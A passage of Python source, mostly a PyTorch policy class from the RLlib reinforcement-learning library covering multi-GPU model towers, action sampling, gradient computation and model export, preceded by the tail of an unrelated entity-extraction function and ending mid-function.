'person': list(set(persons)),
'org': list(set(orgs)),
'gpe': list(set(gpes)),
'outputs': outputs,
'wordcloud':list(zip(overall_unique, overall_count)),
'sentiment-network':edge_data+[node_data]}
|
torch_policy.py
|
import copy
import functools
import gym
import logging
import math
import numpy as np
import os
import threading
import time
import tree # pip install dm_tree
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Set,
Tuple,
Type,
Union,
TYPE_CHECKING,
)
import ray
from ray.rllib.models.catalog import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.torch.torch_action_dist import TorchDistributionWrapper
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.rnn_sequencing import pad_batch_to_sequences_of_same_size
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils import force_list, NullContextManager
from ray.rllib.utils.annotations import DeveloperAPI, override
from ray.rllib.utils.framework import try_import_torch
from ray.rllib.utils.metrics import NUM_AGENT_STEPS_TRAINED
from ray.rllib.utils.metrics.learner_info import LEARNER_STATS_KEY
from ray.rllib.utils.numpy import convert_to_numpy
from ray.rllib.utils.spaces.space_utils import normalize_action
from ray.rllib.utils.threading import with_lock
from ray.rllib.utils.torch_utils import convert_to_torch_tensor
from ray.rllib.utils.typing import (
GradInfoDict,
ModelGradients,
ModelWeights,
TensorType,
TensorStructType,
AlgorithmConfigDict,
)
if TYPE_CHECKING:
from ray.rllib.evaluation import Episode # noqa
torch, nn = try_import_torch()
logger = logging.getLogger(__name__)
@DeveloperAPI
class TorchPolicy(Policy):
"""PyTorch specific Policy class to use with RLlib."""
@DeveloperAPI
def __init__(
self,
observation_space: gym.spaces.Space,
action_space: gym.spaces.Space,
config: AlgorithmConfigDict,
*,
model: Optional[TorchModelV2] = None,
loss: Optional[
Callable[
[Policy, ModelV2, Type[TorchDistributionWrapper], SampleBatch],
Union[TensorType, List[TensorType]],
]
] = None,
action_distribution_class: Optional[Type[TorchDistributionWrapper]] = None,
action_sampler_fn: Optional[
Callable[
[TensorType, List[TensorType]],
Union[
Tuple[TensorType, TensorType, List[TensorType]],
Tuple[TensorType, TensorType, TensorType, List[TensorType]],
],
]
] = None,
action_distribution_fn: Optional[
Callable[
[Policy, ModelV2, TensorType, TensorType, TensorType],
Tuple[TensorType, Type[TorchDistributionWrapper], List[TensorType]],
]
] = None,
max_seq_len: int = 20,
get_batch_divisibility_req: Optional[Callable[[Policy], int]] = None,
):
"""Initializes a TorchPolicy instance.
Args:
observation_space: Observation space of the policy.
action_space: Action space of the policy.
config: The Policy's config dict.
model: PyTorch policy module. Given observations as
input, this module must return a list of outputs where the
first item is action logits, and the rest can be any value.
loss: Callable that returns one or more (a list of) scalar loss
terms.
action_distribution_class: Class for a torch action distribution.
action_sampler_fn: A callable returning either a sampled action,
its log-likelihood and updated state or a sampled action, its
log-likelihood, updated state and action distribution inputs
given Policy, ModelV2, input_dict, state batches (optional),
explore, and timestep. Provide `action_sampler_fn` if you would
like to have full control over the action computation step,
including the model forward pass, possible sampling from a
distribution, and exploration logic.
Note: If `action_sampler_fn` is given, `action_distribution_fn`
must be None. If both `action_sampler_fn` and
`action_distribution_fn` are None, RLlib will simply pass
inputs through `self.model` to get distribution inputs, create
the distribution object, sample from it, and apply some
exploration logic to the results.
The callable takes as inputs: Policy, ModelV2, input_dict
(SampleBatch), state_batches (optional), explore, and timestep.
action_distribution_fn: A callable returning distribution inputs
(parameters), a dist-class to generate an action distribution
object from, and internal-state outputs (or an empty list if
not applicable).
Provide `action_distribution_fn` if you would like to only
customize the model forward pass call. The resulting
distribution parameters are then used by RLlib to create a
distribution object, sample from it, and execute any
exploration logic.
Note: If `action_distribution_fn` is given, `action_sampler_fn`
must be None. If both `action_sampler_fn` and
`action_distribution_fn` are None, RLlib will simply pass
inputs through `self.model` to get distribution inputs, create
the distribution object, sample from it, and apply some
exploration logic to the results.
The callable takes as inputs: Policy, ModelV2, ModelInputDict,
explore, timestep, is_training.
max_seq_len: Max sequence length for LSTM training.
get_batch_divisibility_req: Optional callable that returns the
divisibility requirement for sample batches given the Policy.
"""
self.framework = config["framework"] = "torch"
super().__init__(observation_space, action_space, config)
# Create multi-GPU model towers, if necessary.
# - The central main model will be stored under self.model, residing
# on self.device (normally, a CPU).
# - Each GPU will have a copy of that model under
# self.model_gpu_towers, matching the devices in self.devices.
# - Parallelization is done by splitting the train batch and passing
# it through the model copies in parallel, then averaging over the
# resulting gradients, applying these averages on the main model and
# updating all towers' weights from the main model.
# - In case of just one device (1 (fake or real) GPU or 1 CPU), no
# parallelization will be done.
# If no Model is provided, build a default one here.
if model is None:
dist_class, logit_dim = ModelCatalog.get_action_dist(
action_space, self.config["model"], framework=self.framework
)
model = ModelCatalog.get_model_v2(
obs_space=self.observation_space,
action_space=self.action_space,
num_outputs=logit_dim,
model_config=self.config["model"],
framework=self.framework,
)
if action_distribution_class is None:
action_distribution_class = dist_class
# Get devices to build the graph on.
worker_idx = self.config.get("worker_index", 0)
if not config["_fake_gpus"] and ray.worker._mode() == ray.worker.LOCAL_MODE:
num_gpus = 0
elif worker_idx == 0:
num_gpus = config["num_gpus"]
else:
num_gpus = config["num_gpus_per_worker"]
gpu_ids = list(range(torch.cuda.device_count()))
# Place on one or more CPU(s) when either:
# - Fake GPU mode.
# - num_gpus=0 (either set by user or we are in local_mode=True).
# - No GPUs available.
if config["_fake_gpus"] or num_gpus == 0 or not gpu_ids:
logger.info(
"TorchPolicy (worker={}) running on {}.".format(
worker_idx if worker_idx > 0 else "local",
"{} fake-GPUs".format(num_gpus) if config["_fake_gpus"] else "CPU",
)
)
self.device = torch.device("cpu")
self.devices = [self.device for _ in range(int(math.ceil(num_gpus)) or 1)]
self.model_gpu_towers = [
model if i == 0 else copy.deepcopy(model)
for i in range(int(math.ceil(num_gpus)) or 1)
]
if hasattr(self, "target_model"):
self.target_models = {
m: self.target_model for m in self.model_gpu_towers
}
self.model = model
# Place on one or more actual GPU(s), when:
# - num_gpus > 0 (set by user) AND
# - local_mode=False AND
# - actual GPUs available AND
# - non-fake GPU mode.
else:
logger.info(
"TorchPolicy (worker={}) running on {} GPU(s).".format(
worker_idx if worker_idx > 0 else "local", num_gpus
)
)
# We are a remote worker (WORKER_MODE=1):
# GPUs should be assigned to us by ray.
if ray.worker._mode() == ray.worker.WORKER_MODE:
gpu_ids = ray.get_gpu_ids()
if len(gpu_ids) < num_gpus:
raise ValueError(
"TorchPolicy was not able to find enough GPU IDs! Found "
f"{gpu_ids}, but num_gpus={num_gpus}."
)
self.devices = [
torch.device("cuda:{}".format(i))
for i, id_ in enumerate(gpu_ids)
if i < num_gpus
]
self.device = self.devices[0]
ids = [id_ for i, id_ in enumerate(gpu_ids) if i < num_gpus]
self.model_gpu_towers = []
for i, _ in enumerate(ids):
model_copy = copy.deepcopy(model)
self.model_gpu_towers.append(model_copy.to(self.devices[i]))
if hasattr(self, "target_model"):
self.target_models = {
m: copy.deepcopy(self.target_model).to(self.devices[i])
for i, m in enumerate(self.model_gpu_towers)
}
self.model = self.model_gpu_towers[0]
# Lock used for locking some methods on the object-level.
# This prevents possible race conditions when calling the model
# first, then its value function (e.g. in a loss function), in
        # between which another model call is made (e.g. to compute an
# action).
self._lock = threading.RLock()
self._state_inputs = self.model.get_initial_state()
self._is_recurrent = len(self._state_inputs) > 0
# Auto-update model's inference view requirements, if recurrent.
self._update_model_view_requirements_from_init_state()
# Combine view_requirements for Model and Policy.
self.view_requirements.update(self.model.view_requirements)
self.exploration = self._create_exploration()
self.unwrapped_model = model # used to support DistributedDataParallel
# To ensure backward compatibility:
# Old way: If `loss` provided here, use as-is (as a function).
if loss is not None:
self._loss = loss
# New way: Convert the overridden `self.loss` into a plain function,
# so it can be called the same way as `loss` would be, ensuring
# backward compatibility.
elif self.loss.__func__.__qualname__ != "Policy.loss":
self._loss = self.loss.__func__
# `loss` not provided nor overridden from Policy -> Set to None.
else:
self._loss = None
self._optimizers = force_list(self.optimizer())
        # Store which params (by index within the model's list of
        # parameters) should be updated per optimizer.
        # Maps optimizer idx to a set of param indices.
self.multi_gpu_param_groups: List[Set[int]] = []
main_params = {p: i for i, p in enumerate(self.model.parameters())}
for o in self._optimizers:
param_indices = []
for pg_idx, pg in enumerate(o.param_groups):
for p in pg["params"]:
param_indices.append(main_params[p])
self.multi_gpu_param_groups.append(set(param_indices))
# Create n sample-batch buffers (num_multi_gpu_tower_stacks), each
# one with m towers (num_gpus).
num_buffers = self.config.get("num_multi_gpu_tower_stacks", 1)
self._loaded_batches = [[] for _ in range(num_buffers)]
self.dist_class = action_distribution_class
self.action_sampler_fn = action_sampler_fn
self.action_distribution_fn = action_distribution_fn
# If set, means we are using distributed allreduce during learning.
self.distributed_world_size = None
self.max_seq_len = max_seq_len
self.batch_divisibility_req = (
get_batch_divisibility_req(self)
if callable(get_batch_divisibility_req)
else (get_batch_divisibility_req or 1)
)
@override(Policy)
def compute_actions_from_input_dict(
self,
input_dict: Dict[str, TensorType],
explore: bool = None,
timestep: Optional[int] = None,
**kwargs,
) -> Tuple[TensorType, List[TensorType], Dict[str, TensorType]]:
with torch.no_grad():
# Pass lazy (torch) tensor dict to Model as `input_dict`.
input_dict = self._lazy_tensor_dict(input_dict)
input_dict.set_training(True)
# Pack internal state inputs into (separate) list.
state_batches = [
input_dict[k] for k in input_dict.keys() if "state_in" in k[:8]
]
# Calculate RNN sequence lengths.
seq_lens = (
torch.tensor(
[1] * len(state_batches[0]),
dtype=torch.long,
device=state_batches[0].device,
)
if state_batches
else None
)
return self._compute_action_helper(
input_dict, state_batches, seq_lens, explore, timestep
)
@override(Policy)
@DeveloperAPI
def compute_actions(
self,
obs_batch: Union[List[TensorStructType], TensorStructType],
state_batches: Optional[List[TensorType]] = None,
prev_action_batch: Union[List[TensorStructType], TensorStructType] = None,
prev_reward_batch: Union[List[TensorStructType], TensorStructType] = None,
info_batch: Optional[Dict[str, list]] = None,
episodes: Optional[List["Episode"]] = None,
explore: Optional[bool] = None,
timestep: Optional[int] = None,
**kwargs,
) -> Tuple[TensorStructType, List[TensorType], Dict[str, TensorType]]:
with torch.no_grad():
seq_lens = torch.ones(len(obs_batch), dtype=torch.int32)
input_dict = self._lazy_tensor_dict(
{
SampleBatch.CUR_OBS: obs_batch,
"is_training": False,
}
)
if prev_action_batch is not None:
input_dict[SampleBatch.PREV_ACTIONS] = np.asarray(prev_action_batch)
if prev_reward_batch is not None:
input_dict[SampleBatch.PREV_REWARDS] = np.asarray(prev_reward_batch)
state_batches = [
convert_to_torch_tensor(s, self.device) for s in (state_batches or [])
]
return self._compute_action_helper(
input_dict, state_batches, seq_lens, explore, timestep
)
@with_lock
@override(Policy)
@DeveloperAPI
def compute_log_likelihoods(
self,
actions: Union[List[TensorStructType], TensorStructType],
obs_batch: Union[List[TensorStructType], TensorStructType],
state_batches: Optional[List[TensorType]] = None,
prev_action_batch: Optional[
Union[List[TensorStructType], TensorStructType]
] = None,
prev_reward_batch: Optional[
Union[List[TensorStructType], TensorStructType]
] = None,
actions_normalized: bool = True,
) -> TensorType:
if self.action_sampler_fn and self.action_distribution_fn is None:
raise ValueError(
"Cannot compute log-prob/likelihood w/o an "
"`action_distribution_fn` and a provided "
"`action_sampler_fn`!"
)
with torch.no_grad():
input_dict = self._lazy_tensor_dict(
{SampleBatch.CUR_OBS: obs_batch, SampleBatch.ACTIONS: actions}
)
if prev_action_batch is not None:
input_dict[SampleBatch.PREV_ACTIONS] = prev_action_batch
if prev_reward_batch is not None:
input_dict[SampleBatch.PREV_REWARDS] = prev_reward_batch
seq_lens = torch.ones(len(obs_batch), dtype=torch.int32)
state_batches = [
convert_to_torch_tensor(s, self.device) for s in (state_batches or [])
]
# Exploration hook before each forward pass.
self.exploration.before_compute_actions(explore=False)
# Action dist class and inputs are generated via custom function.
if self.action_distribution_fn:
# Try new action_distribution_fn signature, supporting
# state_batches and seq_lens.
try:
dist_inputs, dist_class, state_out = self.action_distribution_fn(
self,
self.model,
input_dict=input_dict,
state_batches=state_batches,
seq_lens=seq_lens,
explore=False,
is_training=False,
)
# Trying the old way (to stay backward compatible).
# TODO: Remove in future.
except TypeError as e:
if (
"positional argument" in e.args[0]
or "unexpected keyword argument" in e.args[0]
):
dist_inputs, dist_class, _ = self.action_distribution_fn(
policy=self,
model=self.model,
obs_batch=input_dict[SampleBatch.CUR_OBS],
explore=False,
is_training=False,
)
else:
raise e
# Default action-dist inputs calculation.
else:
dist_class = self.dist_class
dist_inputs, _ = self.model(input_dict, state_batches, seq_lens)
action_dist = dist_class(dist_inputs, self.model)
# Normalize actions if necessary.
actions = input_dict[SampleBatch.ACTIONS]
if not actions_normalized and self.config["normalize_actions"]:
actions = normalize_action(actions, self.action_space_struct)
log_likelihoods = action_dist.logp(actions)
return log_likelihoods
@with_lock
@override(Policy)
@DeveloperAPI
def learn_on_batch(self, postprocessed_batch: SampleBatch) -> Dict[str, TensorType]:
# Set Model to train mode.
if self.model:
self.model.train()
# Callback handling.
learn_stats = {}
self.callbacks.on_learn_on_batch(
policy=self, train_batch=postprocessed_batch, result=learn_stats
)
# Compute gradients (will calculate all losses and `backward()`
# them to get the grads).
grads, fetches = self.compute_gradients(postprocessed_batch)
# Step the optimizers.
self.apply_gradients(_directStepOptimizerSingleton)
if self.model:
fetches["model"] = self.model.metrics()
fetches.update(
{
"custom_metrics": learn_stats,
NUM_AGENT_STEPS_TRAINED: postprocessed_batch.count,
}
)
return fetches
@override(Policy)
@DeveloperAPI
def load_batch_into_buffer(
self,
batch: SampleBatch,
buffer_index: int = 0,
) -> int:
# Set the is_training flag of the batch.
batch.set_training(True)
# Shortcut for 1 CPU only: Store batch in `self._loaded_batches`.
if len(self.devices) == 1 and self.devices[0].type == "cpu":
assert buffer_index == 0
pad_batch_to_sequences_of_same_size(
batch=batch,
max_seq_len=self.max_seq_len,
shuffle=False,
batch_divisibility_req=self.batch_divisibility_req,
view_requirements=self.view_requirements,
)
self._lazy_tensor_dict(batch)
self._loaded_batches[0] = [batch]
return len(batch)
# Batch (len=28, seq-lens=[4, 7, 4, 10, 3]):
# 0123 0123456 0123 0123456789ABC
# 1) split into n per-GPU sub batches (n=2).
        # [0123 0123456 012] [3 0123456789 ABC]
# (len=14, 14 seq-lens=[4, 7, 3] [1, 10, 3])
slices = batch.timeslices(num_slices=len(self.devices))
# 2) zero-padding (max-seq-len=10).
# - [0123000000 0123456000 0120000000]
# - [3000000000 0123456789 ABC0000000]
for slice in slices:
pad_batch_to_sequences_of_same_size(
batch=slice,
max_seq_len=self.max_seq_len,
shuffle=False,
batch_divisibility_req=self.batch_divisibility_req,
view_requirements=self.view_requirements,
)
# 3) Load splits into the given buffer (consisting of n GPUs).
slices = [slice.to_device(self.devices[i]) for i, slice in enumerate(slices)]
self._loaded_batches[buffer_index] = slices
# Return loaded samples per-device.
return len(slices[0])
@override(Policy)
@DeveloperAPI
def get_num_samples_loaded_into_buffer(self, buffer_index: int = 0) -> int:
        if len(self.devices) == 1 and self.devices[0].type == "cpu":
assert buffer_index == 0
return sum(len(b) for b in self._loaded_batches[buffer_index])
@override(Policy)
@DeveloperAPI
def learn_on_loaded_batch(self, offset: int = 0, buffer_index: int = 0):
if not self._loaded_batches[buffer_index]:
raise ValueError(
"Must call Policy.load_batch_into_buffer() before "
"Policy.learn_on_loaded_batch()!"
)
# Get the correct slice of the already loaded batch to use,
# based on offset and batch size.
device_batch_size = self.config.get(
"sgd_minibatch_size", self.config["train_batch_size"]
) // len(self.devices)
# Set Model to train mode.
if self.model_gpu_towers:
for t in self.model_gpu_towers:
t.train()
# Shortcut for 1 CPU only: Batch should already be stored in
# `self._loaded_batches`.
if len(self.devices) == 1 and self.devices[0].type == "cpu":
assert buffer_index == 0
if device_batch_size >= len(self._loaded_batches[0][0]):
batch = self._loaded_batches[0][0]
else:
batch = self._loaded_batches[0][0][offset : offset + device_batch_size]
return self.learn_on_batch(batch)
if len(self.devices) > 1:
# Copy weights of main model (tower-0) to all other towers.
state_dict = self.model.state_dict()
# Just making sure tower-0 is really the same as self.model.
assert self.model_gpu_towers[0] is self.model
for tower in self.model_gpu_towers[1:]:
tower.load_state_dict(state_dict)
if device_batch_size >= sum(len(s) for s in self._loaded_batches[buffer_index]):
device_batches = self._loaded_batches[buffer_index]
else:
device_batches = [
b[offset : offset + device_batch_size]
for b in self._loaded_batches[buffer_index]
]
# Callback handling.
batch_fetches = {}
for i, batch in enumerate(device_batches):
custom_metrics = {}
self.callbacks.on_learn_on_batch(
policy=self, train_batch=batch, result=custom_metrics
)
batch_fetches[f"tower_{i}"] = {"custom_metrics": custom_metrics}
# Do the (maybe parallelized) gradient calculation step.
tower_outputs = self._multi_gpu_parallel_grad_calc(device_batches)
# Mean-reduce gradients over GPU-towers (do this on CPU: self.device).
all_grads = []
for i in range(len(tower_outputs[0][0])):
if tower_outputs[0][0][i] is not None:
all_grads.append(
torch.mean(
torch.stack([t[0][i].to(self.device) for t in tower_outputs]),
dim=0,
)
)
else:
all_grads.append(None)
# Set main model's grads to mean-reduced values.
for i, p in enumerate(self.model.parameters()):
p.grad = all_grads[i]
self.apply_gradients(_directStepOptimizerSingleton)
for i, (model, batch) in enumerate(zip(self.model_gpu_towers, device_batches)):
batch_fetches[f"tower_{i}"].update(
{
LEARNER_STATS_KEY: self.extra_grad_info(batch),
"model": model.metrics(),
}
)
batch_fetches.update(self.extra_compute_grad_fetches())
return batch_fetches
@with_lock
@override(Policy)
@DeveloperAPI
def compute_gradients(self, postprocessed_batch: SampleBatch) -> ModelGradients:
assert len(self.devices) == 1
# If not done yet, see whether we have to zero-pad this batch.
if not postprocessed_batch.zero_padded:
pad_batch_to_sequences_of_same_size(
batch=postprocessed_batch,
max_seq_len=self.max_seq_len,
shuffle=False,
batch_divisibility_req=self.batch_divisibility_req,
view_requirements=self.view_requirements,
)
postprocessed_batch.set_training(True)
self._lazy_tensor_dict(postprocessed_batch, device=self.devices[0])
# Do the (maybe parallelized) gradient calculation step.
tower_outputs = self._multi_gpu_parallel_grad_calc([postprocessed_batch])
all_grads, grad_info = tower_outputs[0]
grad_info["allreduce_latency"] /= len(self._optimizers)
grad_info.update(self.extra_grad_info(postprocessed_batch))
fetches = self.extra_compute_grad_fetches()
return all_grads, dict(fetches, **{LEARNER_STATS_KEY: grad_info})
@override(Policy)
@DeveloperAPI
def apply_gradients(self, gradients: ModelGradients) -> None:
if gradients == _directStepOptimizerSingleton:
for i, opt in enumerate(self._optimizers):
opt.step()
else:
# TODO(sven): Not supported for multiple optimizers yet.
assert len(self._optimizers) == 1
for g, p in zip(gradients, self.model.parameters()):
if g is not None:
if torch.is_tensor(g):
p.grad = g.to(self.device)
else:
p.grad = torch.from_numpy(g).to(self.device)
self._optimizers[0].step()
@DeveloperAPI
def get_tower_stats(self, stats_name: str) -> List[TensorStructType]:
"""Returns list of per-tower stats, copied to this Policy's device.
Args:
stats_name: The name of the stats to average over (this str
must exist as a key inside each tower's `tower_stats` dict).
Returns:
The list of stats tensor (structs) of all towers, copied to this
Policy's device.
Raises:
AssertionError: If the `stats_name` cannot be found in any one
of the tower's `tower_stats` dicts.
"""
data = []
for tower in self.model_gpu_towers:
if stats_name in tower.tower_stats:
data.append(
tree.map_structure(
lambda s: s.to(self.device), tower.tower_stats[stats_name]
)
)
assert len(data) > 0, (
f"Stats `{stats_name}` not found in any of the towers (you have "
f"{len(self.model_gpu_towers)} towers in total)! Make "
"sure you call the loss function on at least one of the towers."
)
return data
@override(Policy)
@DeveloperAPI
def get_weights(self) -> ModelWeights:
return {k: v.cpu().detach().numpy() for k, v in self.model.state_dict().items()}
@override(Policy)
@DeveloperAPI
def set_weights(self, weights: ModelWeights) -> None:
weights = convert_to_torch_tensor(weights, device=self.device)
self.model.load_state_dict(weights)
@override(Policy)
@DeveloperAPI
def is_recurrent(self) -> bool:
return self._is_recurrent
@override(Policy)
@DeveloperAPI
def num_state_tensors(self) -> int:
return len(self.model.get_initial_state())
@override(Policy)
@DeveloperAPI
def get_initial_state(self) -> List[TensorType]:
return [s.detach().cpu().numpy() for s in self.model.get_initial_state()]
@override(Policy)
@DeveloperAPI
def get_state(self) -> Union[Dict[str, TensorType], List[TensorType]]:
state = super().get_state()
state["_optimizer_variables"] = []
for i, o in enumerate(self._optimizers):
optim_state_dict = convert_to_numpy(o.state_dict())
state["_optimizer_variables"].append(optim_state_dict)
# Add exploration state.
state["_exploration_state"] = self.exploration.get_state()
return state
@override(Policy)
@DeveloperAPI
def set_state(self, state: dict) -> None:
# Set optimizer vars first.
optimizer_vars = state.get("_optimizer_variables", None)
if optimizer_vars:
assert len(optimizer_vars) == len(self._optimizers)
for o, s in zip(self._optimizers, optimizer_vars):
optim_state_dict = convert_to_torch_tensor(s, device=self.device)
o.load_state_dict(optim_state_dict)
# Set exploration's state.
if hasattr(self, "exploration") and "_exploration_state" in state:
self.exploration.set_state(state=state["_exploration_state"])
# Then the Policy's (NN) weights.
super().set_state(state)
@DeveloperAPI
def extra_grad_process(
self, optimizer: "torch.optim.Optimizer", loss: TensorType
) -> Dict[str, TensorType]:
"""Called after each optimizer.zero_grad() + loss.backward() call.
Called for each self._optimizers/loss-value pair.
Allows for gradient processing before optimizer.step() is called.
E.g. for gradient clipping.
Args:
optimizer: A torch optimizer object.
loss: The loss tensor associated with the optimizer.
Returns:
            A dict with information on the gradient processing step.
"""
return {}
@DeveloperAPI
def extra_compute_grad_fetches(self) -> Dict[str, Any]:
"""Extra values to fetch and return from compute_gradients().
Returns:
Extra fetch dict to be added to the fetch dict of the
`compute_gradients` call.
"""
return {LEARNER_STATS_KEY: {}} # e.g, stats, td error, etc.
@DeveloperAPI
def extra_action_out(
self,
input_dict: Dict[str, TensorType],
state_batches: List[TensorType],
model: TorchModelV2,
action_dist: TorchDistributionWrapper,
) -> Dict[str, TensorType]:
"""Returns dict of extra info to include in experience batch.
Args:
input_dict: Dict of model input tensors.
state_batches: List of state tensors.
model: Reference to the model object.
action_dist: Torch action dist object
to get log-probs (e.g. for already sampled actions).
Returns:
Extra outputs to return in a `compute_actions_from_input_dict()`
call (3rd return value).
"""
return {}
@DeveloperAPI
def extra_grad_info(self, train_batch: SampleBatch) -> Dict[str, TensorType]:
"""Return dict of extra grad info.
Args:
            train_batch: The training batch for which to produce
                extra grad info.
Returns:
The info dict carrying grad info per str key.
"""
return {}
@DeveloperAPI
def optimizer(
self,
) -> Union[List["torch.optim.Optimizer"], "torch.optim.Optimizer"]:
"""Custom the local PyTorch optimizer(s) to use.
Returns:
The local PyTorch optimizer(s) to use for this Policy.
"""
if hasattr(self, "config"):
optimizers = [
torch.optim.Adam(self.model.parameters(), lr=self.config["lr"])
]
else:
optimizers = [torch.optim.Adam(self.model.parameters())]
if getattr(self, "exploration", None):
optimizers = self.exploration.get_exploration_optimizer(optimizers)
return optimizers
@override(Policy)
@DeveloperAPI
def export_model(self, export_dir: str, onnx: Optional[int] = None) -> None:
"""Exports the Policy's Model to local directory for serving.
Creates a TorchScript model and saves it.
Args:
export_dir: Local writable directory or filename.
onnx: If given, will export model in ONNX format. The
                value of this parameter sets the ONNX OpSet version to use.
"""
self._lazy_tensor_dict(self._dummy_batch)
# Provide dummy state inputs if not an RNN (torch cannot jit with
# returned empty internal states list).
if "state_in_0" not in self._dummy_batch:
self._dummy_batch["state_in_0"] = self._dummy_batch[
SampleBatch.SEQ_LENS
] = np.array([1.0])
state_ins = []
i = 0
while "state_in_{}".format(i) in self._dummy_batch:
state_ins.append(self._dummy_batch["state_in_{}".format(i)])
i += 1
dummy_inputs = {
k: self._dummy_batch[k]
for k in self._dummy_batch.keys()
if k != "is_training"
}
if not os.path.exists(export_dir):
os.makedirs(export_dir)
seq_lens = self._dummy_batch[SampleBatch.SEQ_LENS]
if onnx:
file_name = os.path.join(export_dir, "model.onnx")
torch.onnx.export(
self.model,
(dummy_inputs, state_ins, seq_lens),
file_name,
export_params=True,
opset_version=onnx,
do_constant_folding=True,
input_names=list(dummy_inputs.keys())
+ ["state_ins", SampleBatch.SEQ_LENS],
output_names=["output", "state_outs"],
dynamic_axes={
k: {0: "batch_size"}
for k in list(dummy_inputs.keys())
+ ["state_ins", SampleBatch.SEQ_LENS]
},
)
else:
traced = torch.jit.trace(self.model, (dummy_inputs, state_ins, seq_lens))
file_name = os.path.join(export_dir, "model.pt")
traced.save(file_name)
@override(Policy)
def export_checkpoint(self, export_dir: str) -> None:
raise NotImplementedError
@override(Policy)
@DeveloperAPI
def import_model_from_h5(self, import_file: str) -> None:
"""Imports weights into torch model."""
return self.model.import_from_h5(import_file)
@with_lock
def _compute_action_helper(
self, input_dict, state_batches, seq_lens, explore, timestep
):
"""Shared forward pass logic (w/ and w/o trajectory view API).
Returns:
A tuple consisting of a) actions, b) state_out, c) extra_fetches.
"""
explore = explore if explore is not None else self.config["explore"]
timestep = timestep if timestep is not None else self.global_timestep
self._is_recurrent = state_batches is not None and state_batches != []
# Switch to eval mode.
if self.model:
self.model.eval()
if self.action_sampler_fn:
action_dist = dist_inputs = None
action_sampler_outputs = self.action_sampler_fn(
self,
self.model,
input_dict,
state_batches,
explore=explore,
timestep=timestep,
)
if len(action_sampler_outputs) == 4:
actions, logp, dist_inputs, state_out = action_sampler_outputs
else:
actions, logp, state_out = action_sampler_outputs
else:
# Call the exploration before_compute_actions hook.
self.exploration.before_compute_actions(explore=explore, timestep=timestep)
if self.action_distribution_fn:
# Try new action_distribution_fn signature, supporting
# state_batches and seq_lens.
try:
dist_inputs, dist_class, state_out = self.action_distribution_fn(
self,
self.model,
input_dict=input_dict,
state_batches=state_batches,
seq_lens=seq_lens,
explore=explore,
timestep=timestep,
is_training=False,
)
# Trying the old way (to stay backward compatible).
# TODO: Remove in future.
except TypeError as e:
if (
"positional argument" in e.args[0]
or "unexpected keyword argument" in e.args[0]
):
(
dist_inputs,
dist_class,
state_out,
) = self.action_distribution_fn(
self,
self.model,
input_dict[SampleBatch.CUR_OBS],
explore=explore,
timestep=timestep,
is_training=False,
)
else:
raise e
else:
dist_class = self.dist_class
dist_inputs, state_out = self.model(input_dict, state_batches, seq_lens)
if not (
isinstance(dist_class, functools.partial)
or issubclass(dist_class, TorchDistributionWrapper)
):
raise ValueError(
"`dist_class` ({}) not a TorchDistributionWrapper "
"subclass! Make sure your `action_distribution_fn` or "
"`make_model_and_action_dist` return a correct "
"distribution class.".format(dist_class.__name__)
)
action_dist = dist_class(dist_inputs, self.model)
# Get the exploration action from the forward results.
actions, logp = self.exploration.get_exploration_action(
action_distribution=action_dist, timestep=timestep, explore=explore
)
input_dict[SampleBatch.ACTIONS] = actions
# Add default and custom fetches.
extra_fetches = self.extra_action_out(
input_dict, state_batches, self.model, action_dist
)
# Action-dist inputs.
if dist_inputs is not None:
extra_fetches[SampleBatch.ACTION_DIST_INPUTS] = dist_inputs
# Action-logp and action-prob.
if logp is not None:
extra_fetches[SampleBatch.ACTION_PROB] = torch.exp(logp.float())
extra_fetches[SampleBatch.ACTION_LOGP] = logp
# Update our global timestep by the batch size.
self.global_timestep += len(input_dict[SampleBatch.CUR_OBS])
return convert_to_numpy((actions, state_out, extra_fetches))
def _lazy_tensor_dict(self, postprocessed_batch: SampleBatch, device=None):
# TODO: (sven): Keep for a while to ensure backward compatibility.
if not isinstance(postprocessed_batch, SampleBatch):
postprocessed_batch = SampleBatch(postprocessed_batch)
postprocessed_batch.set_get_interceptor(
functools.partial(convert_to_torch_tensor, device=device or self.device)
)
return postprocessed_batch
def _multi_gpu_parallel_grad_calc(
self, sample_batches: List[SampleBatch]
) -> List[Tuple[List[TensorType], GradInfoDict]]:
"""Performs a parallelized loss and gradient calculation over the batch.
Splits up the given train batch into n shards (n=number of this
Policy's devices) and passes each data shard (in parallel) through
the loss function using the individual devices' models
(self.model_gpu_towers). Then returns each tower's outputs.
Args:
sample_batches: A list of SampleBatch shards to
calculate loss and gradients for.
Returns:
A list (one item per device) of 2-tuples, each with 1) gradient
list and 2) grad info dict.
"""
assert len(self.model_gpu_towers) == len(sample_batches)
lock = threading.Lock()
results = {}
grad_enabled = torch.is_grad_enabled()
def _worker(shard_idx, model, sample_batch, device):
torch.set_grad_enabled(grad_enabled)
try:
with NullContextManager() if device.type == "cpu" else torch.cuda.device( # noqa: E501
device
):
loss_out = force_list(
self._loss(self, model, self.dist_class, sample_batch)
)
# Call Model's custom-loss with Policy loss outputs and
# train_batch.
loss_out = model.custom_loss(loss_out, sample_batch)
assert len(loss_out) == len(self._optimizers)
# Loop through all optimizers.
grad_info = {"allreduce_latency": 0.0}
parameters = list(model.parameters())
all_grads = [None for _ in range(len(parameters))]
for opt_idx, opt in enumerate(self._optimizers):
# Erase gradients in all vars of the tower that this
# optimizer would affect.
param_indices = self.multi_gpu_param_groups[opt_idx]
for param_idx, param in enumerate(parameters):
if param_idx in param_indices and param.grad is not None:
param.grad.data.zero_()
# Recompute gradients of loss over all variables.
loss_out[opt_idx].backward(retain_graph=True)
grad_info.update(
self.extra_grad_process(opt, loss_out[opt_idx])
)
grads = []
# Note that return values are just references;
# Calling zero_grad would modify the values.
for param_idx, param in enumerate(parameters):
if param_idx in param_indices:
if param.grad is not None:
grads.append(param.grad)
all_grads[param_idx] = param.grad
if self.distributed_world_size:
start = time.time()
if torch.cuda.is_available():
# Sadly, allreduce_coalesced does not work with
# CUDA yet.
for g in grads:
torch.distributed.all_reduce(
g, op=torch.distributed.ReduceOp.SUM
)
else:
torch.distributed.all_reduce_coalesced(
grads, op=torch.distributed.ReduceOp.SUM
)
for param_group in opt.param_groups:
for p in param_group["params"]:
if p.grad is not None:
p.grad /= self.distributed_world_size
grad_info["allreduce_latency"] += time.time() - start
with lock:
